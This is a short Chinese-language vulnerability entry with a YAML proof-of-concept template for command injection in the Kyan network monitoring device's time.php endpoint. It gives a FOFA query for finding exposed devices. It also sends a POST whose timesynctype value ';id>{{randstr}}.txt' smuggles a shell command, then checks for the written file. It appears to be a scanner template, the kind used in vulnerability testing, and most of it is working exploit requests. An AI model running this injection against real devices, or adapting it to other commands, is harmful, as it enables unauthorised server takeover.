漏洞描述
Kyan 网络监控设备 time.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞
fofa: title="platform - Login"
kyan-network-time-php-rce: Kyan 网络监控设备 time.php 远程命令执行漏洞
PoC代码[已公开]
id: kyan-network-time-php-rce
info:
name: Kyan 网络监控设备 time.php 远程命令执行漏洞
author: zan8in
severity: critical
verified: false
description: |-
Kyan 网络监控设备 time.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞
fofa: title="platform - Login"
tags: kyan,rce
created: 2023/09/03
set:
randstr: randomLowercase(12)
rules:
r0:
request:
method: POST
path: /time.php
body: |
timesynctype=;id>{{randstr}}.txt
expression: response.status == 200
r1:
request:
method: GET
path: /{{randstr}}.txt
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()